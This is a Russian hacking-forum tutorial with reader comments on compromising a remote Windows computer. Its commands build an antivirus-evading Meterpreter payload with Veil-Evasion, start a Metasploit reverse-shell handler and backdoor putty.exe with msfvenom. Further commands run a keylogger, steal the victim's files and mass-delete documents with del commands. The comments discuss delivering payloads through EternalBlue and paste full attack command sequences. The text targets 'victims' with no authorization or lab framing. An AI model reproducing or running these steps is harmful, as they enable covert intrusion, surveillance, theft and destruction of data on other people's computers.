Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:
N

novikov433

а ещё такой момент - а можно ли как то самому закачать файл жертве и открыть там? сразу же после взлома эксплотом? и ещё не ясно, почему в модуль ползной нагрузки этого нет по умолчанию и приходится делать лишние действия
 
N

novikov433

никак не могу разобраться(
я тоже не могу понять - написано взлом удаленного компьютера, соответвенно нужно его сразу же взламывать а не мудрить с какой то закачкой файла; зачем закачивать файл, если его сразу взломали?
 
M

MEBIUS

я тоже не могу понять - написано взлом удаленного компьютера, соответвенно нужно его сразу же взламывать а не мудрить с какой то закачкой файла; зачем закачивать файл, если его сразу взломали?
Нужно грамотно распределить нагрузку. Когда читаешь чью-нибудь статью, понимаешь что в этой сфере столько всего, особенно это прикольное( чувство когда мозг закипает.
 
  • Нравится
Реакции: novikov433
R

remez

Vander, спасибо за актуальную тему(как раз обновление Veil).



Интересует доставка полученного файла на компьютер жертвы средствами Metasploit...

Как я себе это представляю:

  1. Генерирую payload в Veil так как это описано у Вас в статье. На выходе получаю файл, скажем, eggs.exe.
    Затем в msf выбираю эксплоит (к примеру eternalblue, для натуральности), у которого в OPTIONS есть параметр PAYLOADS.
Вопрос 1: Каким образом прикрутить полученный eggs.exe к нашему эксплоиту? В голове все смешалось...

  • получившийся payload - в .exe
    сам эксплоит собирает payload-ы в - .dll
Вопрос 2: Какие (помимо нового Veil) есть актуальные способы обфускации нагрузки и обхода АВ?
Сделал на Veil и ничего не надо прикручивать к этому файлу, за исключением цифровой подписи. А потом ловишь сессию на msf
 

Urfin--Juice

Green Team
14.11.2017
203
74
BIT
3
Сделал на Veil и ничего не надо прикручивать к этому файлу, за исключением цифровой подписи. А потом ловишь сессию на msf
Вы имеете ввиду просто сгенерить в Veil нагрузку в .exe, доставить ее на целевой хост и там уже запускать.
Ключевой момент в моем вопросе - доставить на хост. Я хочу доставить нагрузку на хост не абы как, а с помощью конкретного эксплоита(eternal), который, выполняясь, доставляет некий пэйлоад на целевую систему. Так вот я хочу доставить через eternal именно сгенерированный .exe
 
  • Нравится
Реакции: remez
F

FuSp

Извините пожалуйста, как проделать то же, только с hta сервером, просто он только локальные айпи кушает, а хотелось бы ему скормить публичный. Подскажите как это сделать?
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Извините пожалуйста, как проделать то же, только с hta сервером, просто он только локальные айпи кушает, а хотелось бы ему скормить публичный. Подскажите как это сделать?
вам нужен белый статический ip и пробросить порты в роутере, или купить впс ...
 
  • Нравится
Реакции: Vander, IioS и remez
S

Sinistra

Vander, не мешало бы обновить статью, т.к. Veil-Evasion уже не поддерживается разработчиками и содержит устаревшие пакеты зависимостей, которые могут привести к некорректной работе фрейма. Вместо него стоит устанавливать Veil:

git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
cd setup
sudo ./setup.sh -c
 
  • Нравится
Реакции: Сергей Попов

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Vander, не мешало бы обновить статью, т.к. Veil-Evasion уже не поддерживается разработчиками и содержит устаревшие пакеты зависимостей, которые могут привести к некорректной работе фрейма. Вместо него стоит устанавливать Veil:

***Скрытый текст***

Да, пожалуй, стоит немного подредактировать. Про Veil я уже писал - https://codeby.net/threads/veil-framework.60978/
 
D

DarkAres

На виртуалке я понимаю ничего не выйдет?
 
S

svd

Всем привет столкнулся с очень смешной проблемой которая как я прочитал вписывается из нескольких команд, но не получается залить и поставить wine32 и прописать путь вроде при тесте сети показывает что уязвим sploit использовал eternal и ms17_010 может есть кто понимает как поставить вино на виртуалку? могу закинуть фото если нужно?
 
Последнее редактирование модератором:

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Всем привет столкнулся с очень смешной проблемой которая как я прочитал вписывается из нескольких команд, но не получается залить и поставить wine32 и прописать путь вроде при тесте сети показывает что уязвим sploit использовал eternal и ms17_010 может есть кто понимает как поставить вино на виртуалку? могу закинуть фото если нужно?
Что я только что прочитал? Может по пунктам попробуешь разложить, сдобрить это все знаками препинания, глядишь, кто нить и поймет, что ты донести хотел.
 
  • Нравится
Реакции: n01n02h
S

svd

да воде делаю все как нужно но при самой атаке выбивает ошибку
все мои команды
apt-get update, apt-get install wine, netdiscover, msfconsole, use auxiliary/scanner/smb/smb_ms17_010, options, set RHOSTS victim-ip, exploit, cd Desktop/ git clone https://github.com/ElevenPaths/Eterna...cd Eternalblue-Doublepulsar-Metasploit cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ reload_all, use exploit/windows/smb/eternalblue_doublepulsar, options ,set DOUBLEPULSARPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps set ETERNALBLUEPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps options set PROCESSINJECT explorer.exe set RHOST victim-ip, set TARGETARCHITECTURE x86 show targets set target 9 ,set PAYLOAD windows/meterpreter/reverse_tcp ifconfig set LHOST your-ip, exploit
 

RACOON

One Level
10.04.2017
5
4
BIT
0
да воде делаю все как нужно но при самой атаке выбивает ошибку
все мои команды
apt-get update, apt-get install wine, netdiscover, msfconsole, use auxiliary/scanner/smb/smb_ms17_010, options, set RHOSTS victim-ip, exploit, cd Desktop/ git clone https://github.com/ElevenPaths/Eterna...cd Eternalblue-Doublepulsar-Metasploit cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ reload_all, use exploit/windows/smb/eternalblue_doublepulsar, options ,set DOUBLEPULSARPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps set ETERNALBLUEPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps options set PROCESSINJECT explorer.exe set RHOST victim-ip, set TARGETARCHITECTURE x86 show targets set target 9 ,set PAYLOAD windows/meterpreter/reverse_tcp ifconfig set LHOST your-ip, exploit

Лучше не стало. Дошел до половины этой писанины, выколал глаза и потом задумался: "А может я зря это всё читаю и там нету ни одной переменной для опций ?". Советовал бы отредактировать пост, чтобы каждая новая команда начиналась с новой строки для начала и укажите какие переменные у вас.
 
  • Нравится
Реакции: Mitistofel
S

svd

вот это помогает только пока не понимаю что конкретно нужно сделать по поводу сплоита так выдает вот такие ошибки и я не знаю что сделать

---- Добавлено позже ----

может вы разберетесь что делать с этим функционалом и просветите как профи а то так хотелось поюзать свою сеть сканер MS17_010 показывает зеленый плюс а когда начинаю работать сплоитом eternal i pulsarom задает вопрос вы уверены что хост уязвим

---- Добавлено позже ----

может вы разберетесь что делать с этим функционалом и просветите как профи а то так хотелось поюзать свою сеть сканер MS17_010 показывает зеленый плюс а когда начинаю работать сплоитом eternal b pu

---- Добавлено позже ----

плохо что скрин нельзя
 
Последнее редактирование модератором:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!